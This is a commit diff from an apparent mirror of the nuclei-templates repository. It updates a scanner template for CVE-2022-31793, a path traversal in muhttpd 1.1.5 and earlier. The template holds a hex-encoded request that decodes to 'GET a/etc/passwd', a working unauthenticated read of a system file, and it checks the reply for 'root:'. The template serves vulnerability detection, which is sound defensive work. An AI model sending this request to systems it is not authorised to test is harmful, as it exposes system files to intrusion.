daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2022-31793.yaml

patch-1
Prince Chaddha 2022-08-04 18:59:59 +04:00 committed by GitHub
parent 13771bb84d
commit 44ccfbf7b2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
cves/2022/CVE-2022-31793.yaml
View File

@ -3,18 +3,21 @@ id: CVE-2022-31793
info:
name: muhttpd <= 1.1.5 - Path traversal
author: scent2d
severity: unknown
severity: high
description: |
A Path traversal vulnerability exists in versions muhttpd 1.1.5 and earlier. The vulnerability is directly requestable to files within the file system.
reference:
- https://derekabdine.com/blog/2022-arris-advisory.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31793
- https://nvd.nist.gov/vuln/detail/CVE-2022-31793
tags: cve,cve2022,muhttpd,lfi,unauth
metadata:
verified: true
tags: cve,cve2022,network,muhttpd,lfi,unauth
network:
- host:
- "{{Hostname}}"
inputs:
- data: "47455420612F6574632F706173737764"
type: hex
@ -23,7 +26,7 @@ network:
read-size: 128
matchers:
- type: word
part: body
encoding: hex
words:
- "726f6f743a"
part: body